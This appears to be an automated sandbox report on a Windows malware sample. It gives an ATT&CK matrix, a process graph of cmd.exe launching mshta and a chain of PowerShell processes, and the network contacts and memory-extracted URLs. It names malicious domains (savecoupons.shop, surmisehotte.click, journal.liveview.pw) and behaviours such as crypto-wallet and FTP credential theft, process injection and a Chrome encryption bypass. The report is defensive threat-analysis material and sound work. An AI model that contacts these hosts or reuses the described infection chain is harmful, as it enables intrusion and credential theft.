                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    2
                    Software Packing
                    Security Account Manager24
                    System Information Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Remote Access Software
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts3
                    PowerShell
                    Login Hook1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model2
                    Clipboard Data
                    3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Extra Window Memory Injection
                    LSA Secrets11
                    Virtualization/Sandbox Evasion
                    SSHKeylogging14
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials2
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579348 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 41 surmisehotte.click 2->41 43 savecoupons.shop 2->43 45 journal.liveview.pw 2->45 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 12 other signatures 2->67 12 cmd.exe 1 2->12         started        signatures3 process4 process5 14 mshta.exe 17 12->14         started        18 conhost.exe 12->18         started        dnsIp6 59 savecoupons.shop 172.67.223.7, 443, 49754 CLOUDFLARENETUS United States 14->59 87 Suspicious powershell command line found 14->87 20 powershell.exe 18 14->20         started        signatures7 process8 signatures9 69 Attempt to bypass Chrome Application-Bound Encryption 20->69 71 Suspicious powershell command line found 20->71 73 Found many strings related to Crypto-Wallets (likely being stolen) 20->73 75 3 other signatures 20->75 23 powershell.exe 15 16 20->23         started        27 conhost.exe 20->27         started        process10 dnsIp11 53 journal.liveview.pw 104.21.37.173, 443, 49755 CLOUDFLARENETUS United States 23->53 77 Injects a PE file into a foreign processes 23->77 29 powershell.exe 23->29         started        33 conhost.exe 23->33         started        signatures12 process13 dnsIp14 55 surmisehotte.click 104.21.96.1, 443, 49756, 49757 CLOUDFLARENETUS United States 29->55 57 127.0.0.1 unknown unknown 29->57 79 Query firmware table information (likely to detect VMs) 29->79 81 Found many strings related to Crypto-Wallets (likely being stolen) 29->81 83 Tries to harvest and steal ftp login credentials 29->83 85 2 other signatures 29->85 35 chrome.exe 29->35         started        signatures15 process16 dnsIp17 47 192.168.11.20, 137, 1900, 443 unknown unknown 35->47 49 239.255.255.250, 1900 unknown Reserved 35->49 38 chrome.exe 35->38         started        process18 dnsIp19 51 www.google.com 172.217.15.196, 443, 49761, 49762 GOOGLEUS United States 38->51

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    surmisehotte.click
                    104.21.96.1
                    truetrue
                      unknown
                      www.google.com
                      172.217.15.196
                      truefalse
                        high
                        journal.liveview.pw
                        104.21.37.173
                        truetrue
                          unknown
                          savecoupons.shop
                          172.67.223.7
                          truetrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            grannyejh.lattrue
                              unknown
                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                high
                                https://surmisehotte.click/apitrue
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEchrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://shop.advanceautoparts.com/web/OrderItemDisplaychrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://savecoupons.shop/singl6.mp4t%powershell.exe, 00000003.00000002.56226345857.0000000008192000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://dns-tunnel-check.googlezip.net/connectchrome.exe, 00000009.00000002.57298031858.0000781C03578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://polymer.github.io/AUTHORS.txtchrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://www.zappos.com/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.guitarcenter.com/cartchrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://unisolated.invalid/chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://setup.office.comchrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.altardstate.com/cart/chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://surmisehotte.click/hurpowershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://savecoupons.shop/singl6.mp4...mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56247007984.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56246272360.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249621751.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.adorama.com/als.mvc/cartviewchrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)chrome.exe, 00000009.00000002.57289091865.0000781C02978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285755859.0000781C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286086306.0000781C0233C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.bestbuy.com/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://packetstormsecurity.com/files/download/22459/BIOS320.EXErchrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://stackoverflow.com/q/14436606/23354powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://crbug.com/593024chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://polymer.github.io/PATENTS.txtchrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://www.google.com/search?q=autoitchrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297148446.0000781C03488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296034126.0000781C03378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285101049.0000781C02204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.ae.com/us/en/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplaychrome.exe, 00000009.00000002.57288458289.0000781C027A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.ecosia.org/newtab/chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299573074.0000781C03720000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000009.00000002.57291222045.0000781C02C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.gamestop.com/cart/chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.boostmobile.com/cart.htmlchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://packetstormsecurity.com/chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295825106.0000781C03324000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.samsclub.com/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.comchrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlndler7chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.overstock.com/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.bloomingdales.com/my-bagchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://gemini.google.com/app?q=chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000009.00000002.57296300869.0000781C033C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://secure.newegg.com/shop/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://secure.eicar.org/eicar.com.txtchrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293972178.0000781C03080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299904492.0000781C037C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://gemini.google.com/app?q=searchTermschrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0330C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303886529.0000781C041E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.jcrew.com/checkout/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://uk.search.yahoo.com/searchchrome.exe, 00000009.00000002.57295950754.0000781C03350000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://setup.office.com/signin-oidcchrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exechrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.officedepot.com/cart/shoppingCart.dochrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://googleads.g.doubleclick.net/chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285823302.0000781C022F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000009.00000003.57225189488.0000781C03684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228863428.0000781C03684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229281440.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57225142821.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57225344845.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://anglebug.com/42266842chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://lens.google.com/gen204chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://surmisehotte.click/Hpowershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_alldp.icochrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288401902.0000781C02790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://savecoupons.shop/mshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  unknown
                                                                                                                                                  https://surmisehotte.click/powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://www.google.com/search?q=atchrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287586656.0000781C025C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285101049.0000781C02204000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/html/r20210916/r20110914/zrt_lookup.html?fsb=1#RS-0-&adk=chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://anglebug.com/42263580chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://apis.google.comchrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://savecoupons.shop/singl6.mp4ventindowsINetCookiesLmshta.exe, 00000002.00000003.56233772606.0000000003141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249325888.0000000003142000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://surmisehotte.click//powershell.exe, 00000008.00000002.57431193652.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.talbots.com/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slotchrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.bhphotovideo.com/find/cart.jspchrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exechrome.exe, 00000009.00000002.57301057032.0000781C03A42000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226362545.0000781C037E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299963117.0000781C037F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.vitalsource.com/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://issuetracker.google.com/292285899chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295376441.0000781C032B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://www.carid.com/cart.phpchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://savecoupons.shop/singl6.mp4WinSta0mshta.exe, 00000002.00000002.56249259222.0000000003110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56248897252.0000000003060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://www.pokemoncenter.com/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://lens.google.com/v3/uploadchrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://recoveringlib.blogspot.com/chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://stackoverflow.com/q/2152978/23354powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://anglebug.com/42265720chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://anglebug.com/42264571chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://lens.google.com/uploadchrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
